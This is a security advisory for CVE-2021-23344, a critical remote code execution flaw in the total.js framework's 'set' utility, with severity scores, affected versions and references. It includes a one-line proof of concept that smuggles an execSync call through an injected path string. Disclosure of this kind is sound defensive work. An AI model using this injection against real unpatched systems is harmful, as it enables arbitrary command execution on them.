CVE-2021-23344

CRITICAL9.8EPSS 12.7%

total.js Remote Code Execution Vulnerability

Published: 3/19/2021Modified: 3/13/2026

Description

total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application. Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`. ### PoC ```js // To be run in a nodejs console: require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//') ```

Affected packages (1)

npm/total.jsfrom 0, < 3.4.8

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	CRITICAL9.8	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References (3)

ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2021-23344
WEBhttps://github.com/totaljs/framework/commit/c812bbcab8981797d3a1b9993fc42dad3d246f04
WEBhttps://snyk.io/vuln/SNYK-JS-TOTALJS-1077069